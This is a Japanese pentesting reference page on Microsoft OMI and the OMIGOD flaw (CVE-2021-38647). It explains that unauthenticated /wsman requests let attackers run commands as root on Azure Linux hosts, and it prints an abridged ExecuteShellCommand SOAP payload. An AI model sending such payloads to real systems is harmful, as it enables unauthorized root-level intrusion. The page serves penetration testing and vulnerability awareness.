5985,5986 - Pentesting OMI

基本情報

OMIは、Microsoftによって提供される**オープンソース**ツールで、リモート構成管理のために設計されています。これは、次のようなサービスを利用するAzure上のLinuxサーバーに特に関連しています：

• Azure Automation

• Azure Automatic Update

• Azure Operations Management Suite

• Azure Log Analytics

• Azure Configuration Management

• Azure Diagnostics

これらのサービスが有効になると、プロセスomiengineが起動し、rootとしてすべてのインターフェースでリッスンします。

使用されるデフォルトポートは5985（http）および5986（https）です。

CVE-2021-38647 脆弱性

9月16日に観察されたように、前述のサービスを持つAzureに展開されたLinuxサーバーは、OMIの脆弱なバージョンのために影響を受けやすいです。この脆弱性は、OMIサーバーが/wsmanエンドポイントを通じてメッセージを処理する際に、Authenticationヘッダーを要求せずにクライアントを不正に認証することにあります。

攻撃者は、Authenticationヘッダーなしで"ExecuteShellCommand" SOAPペイロードを送信することでこれを悪用し、サーバーにroot権限でコマンドを実行させることができます。

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

CVEに関する詳細情報は**こちらを確認してください**。

参考文献

• https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/

• https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/